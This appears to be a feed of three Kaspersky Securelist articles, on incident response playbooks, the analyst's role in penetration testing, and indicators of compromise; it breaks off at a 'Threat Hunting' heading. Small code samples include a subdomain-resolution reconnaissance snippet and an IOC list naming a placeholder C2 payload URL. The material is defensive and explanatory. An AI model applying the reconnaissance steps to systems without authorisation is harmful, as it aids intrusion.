An incident response playbook is a predefined set of actions to address a specific security incident, such as a malware infection, a violation of security policies, a DDoS attack, etc. Its main goal is to enable a large enterprise security team to respond to cyberattacks in a timely and effective manner. Such playbooks help optimize SOC processes and are a major step toward SOC maturity, but they can be challenging for a company to develop. In this article, I want to share some insights on how to create the (almost) perfect playbook.

Imagine your company is under a phishing attack – the most common attack type. How many and what exact actions should the incident response team take to curb the attack? The first steps would be to find out if an adversary is present and how the infrastructure was penetrated (whether through an infected attachment or a compromised account via a fake website). Next, we want to investigate what is going on within the incident (whether the adversary persists using scheduled tasks or startup scripts) and execute containment measures to mitigate risks and reduce the damage caused by the attack. All this has to be done in a prompt, calculated and precise manner – with the precision of a chess grandmaster – because the stakes are high when it comes to technological interruptions, data leaks, reputational or financial losses.

Why defining your workflow is a vital prestage of playbook development

Depending on the organization, the incident response process will comprise different phases. I will consider the NIST incident response life cycle, one of the most widespread, which is relevant for most large industries – from oil and gas to the automotive sector.

The scheme includes four phases:

  • preparation,
  • detection and analysis,
  • containment, eradication, and recovery,
  • post-incident activity.

All the NIST cycles (or any other incident response workflows) can be broken down into “action blocks”. In turn, the latter can be combined depending on specific attack for a timely and efficient response. Every “action” is a simple instruction that an analyst or an automated script must follow in case of an attack. At Kaspersky, we describe an action as a building block of the form: <a subject> does <an action> on <an object> using <a tool>. This building block describes how a response team or an analyst (<a subject>) will perform a special action (<an action>) on a file, account, IP address, hash, registry key, etc. (<an object>) using systems with the functionality to perform that action (<a tool>).

Defining these actions at each phase of the company’s workflow helps to achieve consistency and create scalable and flexible scenarios, which can be promptly modified to accommodate changes in the infrastructure or any of the conditions.
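
Below is a minimal sketch of this building block in code, assuming a simple dataclass representation (an illustration, not Kaspersky's internal playbook format). It also shows how several blocks can be combined into a fragment of a phishing-response scenario.

```python
# A minimal sketch of the building block "<a subject> does <an action> on
# <an object> using <a tool>" and of composing blocks into a playbook fragment.
# All names are illustrative.
from dataclasses import dataclass

@dataclass
class ActionBlock:
    subject: str   # who performs the action (analyst, SOAR script, ...)
    action: str    # what is done
    obj: str       # what it is done to (file, account, host, URL, ...)
    tool: str      # system that provides the capability

    def describe(self) -> str:
        return f"{self.subject} does '{self.action}' on {self.obj} using {self.tool}"

phishing_containment = [
    ActionBlock("SOC analyst", "block sender and quarantine message", "email", "mail gateway"),
    ActionBlock("SOAR script", "isolate from network", "affected host", "EDR"),
    ActionBlock("SOC analyst", "disable account", "compromised account", "Active Directory"),
]

for step in phishing_containment:
    print(step.describe())
```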

An example of a common response action

1. Be prepared to process incidents

The first phase of any incident response playbook is devoted to the Preparation phase of the NIST incident response life cycle. Usually the preparation phase includes many different steps such as incident prevention, vulnerability management, user awareness, malware prevention, etc. I will focus on the step involving playbooks and incident response. Within this phase it is vital to define the alert field set and its visual representation. For the response team’s convenience, it is a good idea to prepare different field sets for each incident type.

A good practice before starting is to define the roles specific to the type of incident, as well as the escalation scenarios, and to designate the communication tools that will be used to contact the stakeholders (email, phone, instant messenger, SMS, etc.). Additionally, the response team has to be provided with adequate access to security and IT systems, analysis software and resources. For a timely response and to avoid human errors, automations and integrations need to be developed and implemented that can be launched by the security orchestration, automation and response (SOAR) system.

2. Create a comfortable track for investigation

The next important phase is Detection, which involves collecting data from IT systems, security tools, public information, and people inside and outside the organization, and identifying precursors and indicators. The main thing to be done during this phase is configuring a monitoring system to detect specific incident types.

In the Analysis phase, I would like to highlight several blocks: documentation, triage, investigation, and notification. Documentation helps the team to define the fields for analysis and how to fill them in once an incident is detected and registered in the incident management system. That done, the response team moves on to triage to perform incident prioritization, categorization, false positive checks, and searches for related incidents. The analyst must be sure that the collected incident data comply with the rules configured for detection of specific suspicious behavior. If the incident data do not match the rule/policy logic, the incident may be tagged as a false positive.

The main part of the analysis phase is investigation, which comprises logging, asset and artifact enrichment, and incident scope forming. When in research mode, the analyst should be able to collect all the data about the incident to identify patient zero and the entry point – knowing how unauthorized access was obtained and which host/account was compromised first. This is important because it helps to properly contain the cyberattack and prevent similar ones in the future. By collecting incident data, one gets information about specific objects (assets and artifacts such as hostname, IP address, file hash, URL, and so on) relating to the incident, which can be used to extend the incident scope.

Once the incident scope is extended, the analyst can enrich assets and artifacts using the data from Threat Intelligence resources or a local system holding inventory information, such as Active Directory, IDM, or CMDB. Based on the information on the affected assets, the response team can measure the risk to make the right choice of further actions. Everything depends on how many hosts, users, systems, business processes, or customers have been affected, and there are several ways to escalate the incident. For a medium risk, only the SOC manager and certain administrators must be notified to contain the incident and resolve the issue. In a critical risk case, however, the crisis team, HR department, or the regulatory authority must be notified by the response team.

The last component of the analysis phase is notification, meaning that every stakeholder must be notified of the incident in a timely manner, so the system owner can step in with effective containment and recovery measures.
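
As a small illustration of the risk-based escalation just described, the sketch below maps an assessed risk level to the stakeholders who must be notified. The mapping and the notification mechanism are assumptions drawn from the examples in the text; in practice the notifications would go through the communication channels and SOAR integrations prepared earlier.

```python
# Illustrative sketch: who gets notified depends on the assessed risk level.
# The mapping below follows the examples in the text and is not a standard.
ESCALATION = {
    "medium": ["SOC manager", "system administrators"],
    "critical": ["crisis team", "HR department", "regulatory authority", "SOC manager"],
}

def notify(risk_level: str, incident_id: str) -> None:
    recipients = ESCALATION.get(risk_level, ["SOC manager"])
    for recipient in recipients:
        # In a real playbook this would use the email/IM/SMS integrations
        # set up during the Preparation phase.
        print(f"[{incident_id}] notifying {recipient} (risk: {risk_level})")

notify("critical", "INC-2023-0142")
```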

Detection and Analysis phase actions to analyze the incident

3. Containment is one of the most important phases to minimize incident consequences

The next big part consists of the Containment, Eradication, and Recovery phases. The main goal of containment is to keep the situation under control after an incident has occurred. Based on the incident’s severity and the possible damage caused, the response team should know the proper set of containment measures.

Following the prestage where workflows were defined, we now have a list of different object types and the possible actions that can be completed using our tool stack. So, with a list of actions in hand, we just need to choose the proper measures based on impact. This stage largely determines the final damage: the smoother and more precise the actions the playbook suggests for this phase, the prompter our response will be in blocking the destructive activity and minimizing the consequences. During the containment process, the analyst performs a number of different actions: deletes malicious files, prevents their execution, performs network host isolation, disables accounts, scans disks with the help of security software, and more.
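
Here is a minimal sketch of how such containment measures can be selected per object type and scaled with the assessed impact. The catalogue of actions below is a hypothetical example of what a tool stack might offer, not a definitive list.

```python
# Illustrative sketch: pick containment measures per object type in the
# incident scope, scaled by assessed impact. The catalogue is hypothetical.
CONTAINMENT_CATALOGUE = {
    "file":    {"low": ["add hash to blocklist"], "high": ["add hash to blocklist", "delete file on all hosts"]},
    "host":    {"low": ["run AV scan"],           "high": ["run AV scan", "isolate host from network"]},
    "account": {"low": ["force password reset"],  "high": ["disable account", "terminate active sessions"]},
}

def plan_containment(scope, impact="low"):
    """Return (object, action) pairs for every object in the incident scope."""
    plan = []
    for obj_type, obj_value in scope:
        for action in CONTAINMENT_CATALOGUE.get(obj_type, {}).get(impact, []):
            plan.append((obj_value, action))
    return plan

incident_scope = [("file", "a1b2c3d4 (hash)"), ("host", "wks-17"), ("account", "j.doe")]
for obj, action in plan_containment(incident_scope, impact="high"):
    print(f"{action} -> {obj}")
```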

The eradication and recovery phases are similar and consist of procedures meant to put the system back into operation. The eradication procedures include cleaning up all traces of the attack – such as malicious files, created scheduled tasks and services – and depend on what traces were left following the intrusion. During the recovery process, the response team should simply restore a ‘business as usual’ state. Just like eradication, the recovery phase is optional, because not every incident impacts the infrastructure. Within this phase we perform certain health check procedures and revoke changes that were made during the attack.

Incident containment steps and recovery measures

4. Lessons learned, or required post-incident actions

The last playbook phase is Post-incident activity, or Lessons learned. This phase is focused on how to improve the process. To simplify this task, we can define a set of questions to be answered by the incident response team. For example:

  • How well did the incident response team manage the incident?
  • What information was the first to be required?
  • Could the team have done a better job sharing the information with other organizations/departments?
  • What could the team do differently next time if the same incident occurred?
  • What additional tools or resources are needed to help prevent or mitigate similar incidents?
  • Were there any wrong actions that had caused damage or inhibited recovery?

Answering these questions will enable the response team to update the knowledge base, improve the detection and prevention mechanism, and adjust the next response plan.

Summary: components of a good playbook

To develop a cybersecurity incident response playbook, we need to figure out the incident management process with focus on phases. As we go deeper into the details, we look for tools/systems to help us with the detection, investigation, containment, eradication, and recovery phases. Once we know our set of tools, we can define the actions that can be performed:

  • logging;
  • enriching the inventory information or telemetry of affected assets or reputation of external resources;
  • incident containment through host isolation, preventing malicious file execution, URL blocking, termination of active sessions, or disabling of accounts;
  • cleaning up the traces of intrusion by deleting remote files, deleting suspicious services, or scheduled tasks;
  • recovering the system’s operational state by revoking changes;
  • formalizing lessons learned by creating a new article in the local knowledge base for later reference.

Additionally, we want to define responsibilities within the response team, for each team member must know what his or her mission-critical role is. Once the preparation is done, we can begin developing the procedures that will form the playbook. As a common rule, every procedure or playbook building block looks like “<a subject> does <an action> on <an object> using <a tool>”—and now that all subjects, actions, objects, and tools have been defined, it is pretty easy to combine them to create procedures and design the playbook. And of course, keep in mind and stick to your response plan and its phases.

Good, Perfect, Best: how the analyst can enhance penetration testing results https://securelist.com/how-the-analyst-can-enhance-pentest/108652/ Fri, 10 Feb 2023 10:00:33 +0000

Penetration testing is something that many (of those who know what a pentest is) see as a search for weak spots and well-known vulnerabilities in a client’s infrastructure, plus a bunch of copied-and-pasted recommendations on how to deal with the security holes thus discovered. In truth, it is not so simple, especially if you want a reliable test and useful results. While pentesters search for vulnerabilities and put a lot of effort into finding and demonstrating possible attack vectors, there is one more team member whose role often remains unclear: the cybersecurity analyst. This professional takes a helicopter view of the target system to properly assess existing security holes and to offer the client a comprehensive picture of the penetration testing results combined with an action plan on how to mitigate the risks. In addition, the cybersecurity analyst formulates that plan in business language, which helps the management team, including the C-level, to understand what they are about to spend money on.

Drawing on Kaspersky’s expertise from dozens of security assessment projects, we want to reveal the details of the analyst’s role on these projects: who they are, what they do, and why projects carried out jointly by pentesters and an analyst are much more useful for clients.

Who is an analyst?

In general, an analyst is a professional who works with datasets. For example, we all know about financial analysts who evaluate the efficiency of financial management. There is more than one type of analyst in the field of information security:

  • Security Operations Center analysts work on incident response and develop detection signatures in a timely fashion;
  • Malware analysts examine malware samples;
  • Cyberthreat intelligence analysts study the behavior of various attackers, diving deeper into their tactics and techniques.

Speaking of the analyst on a security assessment project, their role is to link together the pentester, the manager, and the client. At Kaspersky, for example, an analyst contributes to nearly all security assessment projects, such as penetration testing, application security assessment, red teaming, and others. The goals and target scope of these projects can differ: from searching for vulnerabilities in an online banking application to identifying attack vectors against ICS systems and critical infrastructure assets. Team composition can change, so the analyst works with experts from many areas, enriching the project and sharing the expertise with the client.

The analyst’s role in the security assessment process

It is possible to distinguish the following stages of analyst work in the security assessment process:

  • Advanced reconnaissance,
  • Interpreting network scan results,
  • Threat identification,
  • Verification of threat modeling,
  • Visualization,
  • Vulnerability prioritization,
  • Recommendations,
  • Project follow-up.

Next, we will go over each of these steps in detail.

Advanced reconnaissance

The analyst begins by gathering information about the organization before the security testing conducted by pentesters can begin. The analyst studies public resources to learn about the business systems and external resources, and collects technical information about the target systems: whether the software was custom-built, provided by a vendor, or created from an open-source codebase, what programming language was used, and so on. They also look up known data leaks that may link to client employees and compromised corporate credentials. Often, this data is offered for sale on the dark web, and the analyst’s job is to detect these mentions and warn the client. All this information is collected to discover potential attack vectors and negotiate a project scope with the client. Potential attack vectors will then be explored by pentesters. For example, publicly available employee data can be used for social engineering attacks or to gain access to company resources, and information about the software can be used to find known vulnerabilities.
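
As a small illustration of one piece of such reconnaissance, the sketch below (the domain and the subdomain wordlist are placeholders, not from a real project) checks which common subdomains of a target domain resolve, which helps map externally visible resources:

import socket

domain = "example.com"                         # placeholder target domain
candidates = ["vpn", "mail", "portal", "dev"]  # hypothetical wordlist
for sub in candidates:
    host = f"{sub}.{domain}"
    try:
        print(host, "->", socket.gethostbyname(host))
    except socket.gaierror:
        pass  # the name does not resolve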

Project case: The benefits of OSINT

Here is an example from one of our security assessment projects where information gathering by the analyst helped to identify a new attack vector. The analyst successfully used the Kaspersky Digital Footprint Intelligence service to find compromised employee credentials on the dark web. With the client’s approval, a pentester attempted to authenticate to one of the company’s external services using these credentials and found that they were valid. Given that the client’s network perimeter was highly secured and all public-facing services were properly protected with authentication, the case clearly demonstrated that even a well-hardened infrastructure can be breached using data uncovered through OSINT and threat intelligence.

A diagram of the penetration testing project where the information gathering by the analyst helped to identify a new attack vector

Interpreting scan results

At this stage, we have agreed on a project scope with the client, and pentesters are running an automated network scan to identify the client’s public-facing services and open ports. In our experience, the state of network perimeter cybersecurity in most organizations is far from perfect, but due to project constraints, pentesters typically target only a small number of perimeter security flaws. The analyst examines the network scan output and highlights the key issues. Their goal is to gather detailed information about insufficient network traffic filtering, use of insecure network protocols, exposure of remote management and DBMS access interfaces, and other possible weaknesses. Otherwise, the client will not see the full picture.
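
For illustration only, the minimal sketch below (it assumes the scan results are available as an Nmap XML report named scan.xml; the port list and labels are our own choices) pulls exposed remote management and DBMS ports out of raw scanner output, the kind of detail the analyst highlights for the report:

import xml.etree.ElementTree as ET

# Hypothetical shortlist of services that should not be exposed on the perimeter
RISKY_PORTS = {22: "SSH", 3389: "RDP", 1433: "MSSQL", 3306: "MySQL", 5432: "PostgreSQL"}

root = ET.parse("scan.xml").getroot()          # placeholder Nmap XML report
for host in root.iter("host"):
    addr = host.find("address").get("addr")
    for port in host.iter("port"):
        portid = int(port.get("portid"))
        state = port.find("state").get("state")
        if state == "open" and portid in RISKY_PORTS:
            print(f"{addr}:{portid} ({RISKY_PORTS[portid]}) exposed")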

Threat identification

Information about all attack vectors that were successfully exploited during the test comes from the pentester, and the analyst transforms it into a detailed report describing the vulnerabilities and security flaws. In the hands of the analyst, a description of each attack vector, enriched with evidence, screenshots and collected data, turns into detailed answers to the following questions:

  • What vulnerabilities were found and how?
  • What are the conditions for exploitation?
  • Which component is vulnerable (IP address, port, script, parameter)?
  • What exploit/utility was used?
  • What was the result (data / access level / conditions for exploiting another vulnerability)?

Notably, multiple vulnerabilities pieced together may result in a single attack vector leading from zero-level access to the highest privileges.
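
A minimal sketch (the field names and the sample values are our own illustration, not a Kaspersky report template) of how the answers to these questions can be captured as a structured finding record:

from dataclasses import dataclass

@dataclass
class Finding:
    vulnerability: str            # what was found and how
    exploitation_conditions: str  # what is required to exploit it
    affected_component: str       # IP address, port, script, parameter
    tool_used: str                # exploit/utility
    result: str                   # data / access level / conditions for the next step

finding = Finding(
    vulnerability="SQL injection found via manual parameter tampering",
    exploitation_conditions="unauthenticated access to the login form",
    affected_component="203.0.113.5:443, /login, parameter 'user'",  # documentation-range IP
    tool_used="sqlmap",
    result="read access to the application database",
)
print(finding)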

Verification of threat modeling

After the previous stages are complete, the vulnerabilities should be grouped into categories. Below are a few examples:

  • Web application vulnerabilities (SQL injection, XSS, CSRF);
  • Access control misconfigurations (for example, excessive account privileges, use of the same local account on different hosts);
  • Patch management issues (use of software that has known vulnerabilities).

Next, all vulnerabilities and security misconfigurations are mapped to the threats they enable. Armed with the knowledge of the client’s business systems, the analyst can assess which critical resources a cybercriminal would gain access to in the event of an attack. Will the attacker be able to reach the client’s data, gain access to employees’ personal data, or maybe to payment orders? For example, by gaining total control over the client’s internal infrastructure, including critical IT systems, an attacker can disrupt the organization’s business processes, while the ability to read arbitrary files on the client’s servers can lead to sensitive documents being stolen.

Visualization

The analyst creates a diagram to visualize all of the pentester’s activities relating to the successful attack scenarios. This is an important step not just for the client, who clearly sees everything that happened (what vulnerabilities were exploited, which hosts were accessed, and what threats this led to), but also for the pentesters: looking at this level of detail, they can spot vectors that previously went unnoticed, findings that the report missed, and attacks that could be launched in the future.

Project case: discovering an additional attack vector

During an internal penetration test, our experts found multiple vulnerabilities and obtained administrative privileges in the domain. However, while analyzing the output of the BloodHound tool, the analyst uncovered hidden relationships, stumbling on an attack path within an Active Directory environment. The analyst found that external contractors could escalate their privileges in the system due to Active Directory being misconfigured. Constrained by the project scope, the pentesters did not go on to gain access to contractor credentials, so they were not able to exploit said misconfiguration. The client greatly appreciated the discovery of the new attack vector.

A project case where BloodHound tool output analysis revealed an additional attack vector

Vulnerability prioritization

When all vulnerabilities and threats have been identified, the analyst moves on to the prioritization stage. At this step, it should be decided which vulnerabilities need fixing first. The simplest solution would be to prioritize those with the highest severity level, but it is not always the correct one. There are situations where a “critical” vulnerability identified in a test web application does not cause the same amount of damage as a “medium” vulnerability in a critical system. An example is a vulnerability in an online bank whose exploitation can trigger a whole chain of interconnected vulnerabilities, allowing the attacker to steal the clients’ money.

So, the analyst looks at the overall business impact of the attack vector and the risk level of the vulnerabilities involved. Next, they prioritize the vulnerabilities, starting with the ones that pose the most severe threats but are easiest and fastest to fix, and following with those that require major changes to business processes and are the subject of strategic cybersecurity improvements. After that, the analyst arranges the list of vulnerabilities and recommendations in the order in which measures should be taken.

Vulnerabilities prioritization scheme
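
As a minimal illustration (the findings and scores below are invented and do not represent Kaspersky’s scoring model), the ordering logic described above, business impact first and remediation effort second, could be sketched like this:

findings = [
    {"name": "SQL injection in online banking", "impact": 9, "effort": 2},
    {"name": "XSS in test web application",     "impact": 3, "effort": 1},
    {"name": "Flat internal network",           "impact": 8, "effort": 9},
]
# Highest business impact first; among comparable impact, the quickest fixes first.
for f in sorted(findings, key=lambda f: (-f["impact"], f["effort"])):
    print(f"{f['name']}: impact={f['impact']}, effort={f['effort']}")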

Recommendations

The analyst prepares recommendations, which are part of project deliverables and should consider the following:

  • A timeframe for implementation:
    • Short term (<1 month): easily implemented recommendations, such as installing security updates or changing compromised credentials;
    • Medium term (<1 year): the most important changes requiring significant effort, such as enforcing strict network filtering rules, restricting access to network services and applications, or revising user privileges and revoking excessive ones;
    • Long term (>1 year): changing the architecture and business processes, and implementing or improving security processes and controls, such as developing a robust procedure for periodic updates.
  • The client’s approach to certain systems and business processes;
  • Industry best practices and cybersecurity frameworks.

Project follow-up

At the final stage, the analyst provides three levels of project deliverables:

  • An executive overview for C-level managers and decision-makers who represent the client.
  • Technical details of the security assessment for the client’s IS team, SOC officers, IT specialists, and other employees.
  • Machine-readable results that can be processed automatically or used in the client’s cybersecurity products.

Three levels of project deliverables

Conclusions

To summarize, the main advantages of having an analyst on a security assessment project, as evidenced by our experience, are as follows:

  • The ability to collect and analyze a large amount of data, whether found in external sources or received from pentesters;
  • Pentester time savings: the testers can focus on the technical work instead of preparing the final results and reports;
  • Collaboration with the client’s SOC or blue team to check whether the attacks were noticed, and to capture the defenders’ actions and the timing of the attacks;
  • Visualization of the test results and translation of these into the business language.

Last but not least, the analyst provides a detailed mitigation plan including short-term and long-term recommendations, and actions required for mitigating the discovered threats. As part of our security assessment services, we give clients an overview of cybersecurity risks specific to their organizations (industry, infrastructure, and goals), and advice on hardening security and mitigating future threats.

Indicators of compromise (IOCs): how we collect and use them https://securelist.com/how-to-collect-and-use-indicators-of-compromise/108184/ https://securelist.com/how-to-collect-and-use-indicators-of-compromise/108184/#comments Fri, 02 Dec 2022 08:00:07 +0000 https://kasperskycontenthub.com/securelist/?p=108184

It would hardly be an exaggeration to say that the phrase “indicators of compromise” (or IOCs) can be found in every report published on Securelist. Usually the phrase is followed by MD5 hashes[1], IP addresses and other technical data that should help information security specialists to counter a specific threat. But how exactly can indicators of compromise help them in their everyday work? To find the answer, we asked three Kaspersky experts: Pierre Delcher, Senior Security Researcher in GReAT, Roman Nazarov, Head of SOC Consulting Services, and Konstantin Sapronov, Head of Global Emergency Response Team, to share their experience.

What is cyber threat intelligence, and how do we use it in GReAT?

We at GReAT are focused on identifying, analyzing and describing upcoming or ongoing, preferably unknown cyberthreats, to provide our customers with detailed reports, technical data feeds, and products. This is what we call cyber threat intelligence. It is a highly demanding activity, which requires time, multidisciplinary skills, efficient technology, innovation and dedication. It also requires a large and representative set of knowledge about cyberattacks, threat actors and associated tools over an extended timeframe. We have been doing so since 2008, benefiting from Kaspersky’s decades of cyberthreat data management, and unrivaled technologies. But why are we offering cyber threat intelligence at all?

The intelligence we provide on cyberthreats is composed of contextual information (such as targeted organization types, threat actor techniques, tactics and procedures – or TTPs – and attribution hints), detailed analysis of malicious tools that are exploited, as well as indicators of compromise and detection techniques. This in effect offers knowledge, enables anticipation, and supports three main global goals in an ever-growing threats landscape:

  • Strategic level: helping organizations decide how many of their resources they should invest in cybersecurity. This is made possible by the contextual information we provide, which in turn makes it possible to anticipate how likely an organization is to be targeted, and what the capabilities are of the adversaries.
  • Operational level: helping organizations decide where to focus their existing cybersecurity efforts and capabilities. No organization in the world can claim to have limitless cybersecurity resources and be able to prevent or stop every kind of threat! Detailed knowledge on threat actors and their tactics makes it possible for a given sector of activity to focus prevention, protection, detection and response capabilities on what is currently being (or will be) targeted.
  • Tactical level: helping organizations decide how relevant threats should be technically detected, sorted, and hunted for, so they can be prevented or stopped in a timely fashion. This is made possible by the descriptions of standardized attack techniques and the detailed indicators of compromise we provide, which are strongly backed by our own widely recognized analysis capabilities.

What are indicators of compromise?

To keep it practical, indicators of compromise (IOCs) are technical data that can be used to reliably identify malicious activities or tools, such as malicious infrastructure (hostnames, domain names, IP addresses), communications (URLs, network communication patterns, etc.) or implants (hashes that designate files, file paths, Windows registry keys, artifacts that are written in memory by malicious processes, etc.). While most of them will in practice be file hashes – designating samples of malicious implants – and domain names – identifying malicious infrastructure, such as command and control (C&C) servers – their nature, format and representation are not limited. Some IOC sharing standards exist, such as STIX.
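
For illustration only (this is not a full STIX object; the domain and IP values are placeholders from reserved example ranges, and the only real value is the well-known MD5 of the EICAR test file), a small set of IOCs of different types could be represented like this:

iocs = [
    {"type": "md5",    "value": "44d88612fea8a8f36de82e1278abb02f"},   # EICAR test file
    {"type": "domain", "value": "c2.malicious.example"},               # placeholder domain
    {"type": "ip",     "value": "203.0.113.10"},                       # documentation-range IP
    {"type": "url",    "value": "hxxp://c2.malicious.example/payload"},
]
for ioc in iocs:
    print(ioc["type"], ioc["value"])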

As mentioned before, IOCs are one result of cyber threat intelligence activities. They are useful at operational and tactical levels to identify malicious items and help associate them with known threats. IOCs are provided to customers in intelligence reports and in technical data feeds (which can be consumed by automatic systems), as well as further integrated in Kaspersky products or services (such as sandbox analysis products, Kaspersky Security Network, endpoint and network detection products, and the Open Threat Intelligence Portal to some extent).

How does GReAT identify IOCs?

As part of the threat-hunting process, which is one facet of cyber threat intelligence activity (see the picture below), GReAT aims at gathering as many IOCs as possible about a given threat or threat actor, so that customers can in turn reliably identify or hunt for them, while benefiting from maximum flexibility, depending on their capabilities and tools. But how are those IOCs identified and gathered? The rule of thumb in threat hunting and malicious artifact collection is that there is no fixed magic recipe: several sources, techniques and practices are combined on a case-by-case basis. The more comprehensively those distinct sources are researched and the more thoroughly the analysis practices are executed, the more IOCs will be gathered. Those research activities and practices can only be efficiently orchestrated by knowledgeable analysts, who are backed by extensive data sources and solid technologies.

General overview of GReAT cyber threat intelligence activities

GReAT analysts will leverage the following sources of collection and analysis practices to gather intelligence, including IOCs – while these are the most common, actual practices vary and are only limited by creativity or practical availability:

  • In-house technical data: this includes various detection statistics (often designated as “telemetry”[2]), proprietary files, logs and data collections that have been built across time, as well as the custom systems and tools that make it possible to query them. This is the most precious source of intelligence as it provides unique and reliable data from trusted systems and technologies. By searching for any previously known IOC (e.g., a file hash or an IP address) in such proprietary data, analysts can find associated malicious tactics, behaviors, files and details of communications that directly lead to additional IOCs, or will produce them through analysis. Kaspersky’s private Threat Intelligence Portal (TIP), which is available to customers as a service, offers limited access to such in-house technical data.
  • Open and commercially available data: this includes various services, file data collections that are publicly available, or sold by third parties, such as online file scanning services (e.g., VirusTotal), network system search engines (e.g., Onyphe), passive DNS databases, public sandbox reports, etc. Analysts can search those sources the same way as proprietary data. While some of these data are conveniently available to anyone, information about the collection or execution context, the primary source of information, or data processing details are often not provided. As a result, such sources cannot be trusted by GReAT analysts as much as in-house technical data.
  • Cooperation: by sharing intelligence and developing relationships with trusted partners such as peers, digital service providers, computer security incident response teams (CSIRTs), non-profit organizations, governmental cybersecurity agencies, or even some Kaspersky customers, GReAT analysts can sometimes acquire additional knowledge in return. This vital part of cyber threat intelligence activity enables a global response to cyberthreats, broader knowledge of threat actors, and additional research that would not otherwise be possible.
  • Analysis: this includes automated and human-driven activities that consist of thoroughly dissecting gathered malicious artifacts, such as malicious implants, or memory snapshots, in order to extract additional intelligence from them. Such activities include reverse-engineering or live malicious implant execution in controlled environments. By doing so, analysts will often be able to discover concealed (obfuscated, encrypted) indicators, such as command and control infrastructure for malware, unique development practices from malware authors, or additional malicious tools that are delivered by a threat actor as an additional stage of an attack.
  • Active research: this includes specific threat research operations, tools, or systems (sometimes called “robots”) that are built by analysts with the specific intent to continuously look for live malicious activities, using generic and heuristic approaches. Those operations, tools or systems include, but are not limited to, honeypots[3], sinkholing[4], internet scanning and some specific behavioral detection methods from endpoint and network detection products.

How does GReAT consume IOCs?

Sure, GReAT provides IOCs to customers, or even to the public, as part of its cyber threat intelligence activities. However, before providing them, the IOCs are also a cornerstone of the intelligence collection practices described here. IOCs enable GReAT analysts to pivot from an analyzed malicious implant to additional file detection, from a search in one intelligence source to another. IOCs are thus the common technical interface to all research processes. As an example, one of our active research heuristics might identify previously unknown malware being tentatively executed on a customer system. Looking for the file hash in our telemetry might help identify additional execution attempts, as well as malicious tools that were leveraged by a threat actor, just before the first execution attempt. Reverse engineering of the identified malicious tools might in turn produce additional network IOCs, such as malicious communication patterns or command and control server IP addresses. Looking for the latter in our telemetry will help identify additional files, which in turn will enable further file hash research. IOCs enable a continuous research cycle to spin, but it only begins at GReAT; by providing IOCs as part of an intelligence service, GReAT expects the cycle to keep spinning at the customer’s side.

Apart from their direct use as research tokens, IOCs are also carefully categorized, attached to malicious campaigns or threat actors, and utilized by GReAT when leveraging internal tools. This IOC management process allows for two major and closely related follow-up activities:

  • Threat tracking: by associating known IOCs (as well as advanced detection signatures and techniques) to malicious campaigns or threat actors, GReAT analysts can automatically monitor and sort detected malicious activities. This simplifies any subsequent threat hunting or investigation, by providing a research baseline of existing associated IOCs for most new detections.
  • Threat attribution: by comparing newly found or extracted IOCs to those already catalogued, GReAT analysts can quickly establish links from unknown activities to known malicious campaigns or threat actors. While a common IOC between a known campaign and newly detected activity is never enough to draw any attribution conclusion, it is always a helpful lead to follow.

IOC usage scenarios in SOCs

From our perspective, every security operation center (SOC) uses known indicators of compromise in its operations, one way or another. But before we talk about IOC usage scenarios, let’s go with the simple idea that an IOC is a sign of a known attack.

At Kaspersky, we advise and design SOC operations for different industries and in different formats, but IOC usage and management are always part of the SOC framework we suggest our customers implement. Let’s highlight some usage scenarios of IOCs in an SOC.

Prevention

In general, today’s SOC best practices tell us to defend against attacks by blocking potential threats at the earliest possible stage. If we know the exact indicators of an attack, we can block it, and it is better to do so on multiple levels (both network and endpoint) of the protected environment; in other words, to apply the concept of defense in depth. Blocking any attempts to connect to a malicious IP, resolve a C2 FQDN, or run malware with a known hash should prevent an attack, or at least not give the attacker an easy target. It also saves time for SOC analysts and reduces the noise of SOC false positive alerts. Unfortunately, a very high level of IOC confidence is vital for the prevention usage scenario; otherwise, a huge number of false positive blocking rules will affect the business functions of the protected environment.

Detection

The most popular scenario for IOC usage in an SOC is the automatic matching of infrastructure telemetry against a large collection of known IOCs, and the most common place to do it is the SIEM. This scenario is popular for a number of reasons:

  • SIEM records multiple types of logs, meaning we can match the same IOC with multiple log types, e.g., domain name with DNS requests, those received from corporate DNS servers, and requested URLs obtained from the proxy.
  • Matching in SIEM helps us to provide extended context for analyzed events: in the alert’s additional information an analyst can see why the IOC-based alert was triggered, the type of threat, confidence level, etc.
  • Having all the data on one platform can reduce the workload for the SOC team to maintain infrastructure and prevent the need to organize additional event routing, as described in the following case.

Another popular solution for matching is the Threat Intelligence Platform (TIP). It usually supports richer matching scenarios (such as the use of wildcards) and offloads some of the performance impact that correlation generates in the SIEM. Another big advantage of a TIP is that this type of solution was designed from the start to work with IOCs: to support their data schema and manage them, with more flexibility and features for setting up IOC-based detection logic.

When it comes to detection we usually have a lower requirement for IOC confidence because, although unwanted, false positives during detection are a common occurrence.
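
A minimal sketch (the log format, field names and indicator values are assumptions for illustration) of the core matching logic that a SIEM or TIP automates at scale, here against DNS telemetry:

ioc_domains = {"c2.bad.example", "dropzone.example"}   # hypothetical IOC set
dns_events = [
    {"host": "PC-042", "query": "update.vendor.example"},
    {"host": "PC-017", "query": "c2.bad.example"},
]
for event in dns_events:
    if event["query"] in ioc_domains:
        print(f"ALERT: {event['host']} resolved known-bad domain {event['query']}")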

Investigation

Another routine in which we work with IOCs is the investigation phase of an incident. In this case, we are usually limited to a specific subset of IOCs – those revealed within the particular incident. These IOCs are needed to identify additional affected targets in our environment and define the real scope of the incident. Basically, the SOC team runs a loop of IOC re-use (a minimal sketch of this loop follows the list):

  1. Identify incident-related IOC
  2. Search for IOC on additional hosts
  3. Identify additional IOC on revealed targets, repeat step 2.
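
Here is a minimal sketch of that loop (hosts, artifacts and the initial IOC are invented; in practice every candidate indicator is vetted by an analyst before being re-used):

host_artifacts = {
    "HOST-A": {"bad.exe", "dropper.dll"},
    "HOST-B": {"dropper.dll"},
    "HOST-C": {"calc.exe"},
}
known_iocs = {"bad.exe"}            # IOC from the initial incident (step 1)
affected = set()
queue = set(known_iocs)
while queue:
    ioc = queue.pop()
    for host, artifacts in host_artifacts.items():
        if ioc in artifacts and host not in affected:   # step 2: search other hosts
            affected.add(host)
            new_candidates = artifacts - known_iocs     # step 3: new IOCs on the revealed target
            known_iocs |= new_candidates
            queue |= new_candidates
print("Affected hosts:", sorted(affected))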

Containment, Eradication and Recovery

The next steps of incident handling also apply IOCs. In these stages the SOC team focuses on IOCs obtained from the incident, and uses them in the following way:

  • Containment – limit attacker abilities to act by blocking identified IOCs
  • Eradication and Recovery – monitor for the absence of IOC-related behavior to verify that the eradication and recovery phases were completed successfully and the attacker’s presence in the environment was fully eliminated.

Threat Hunting

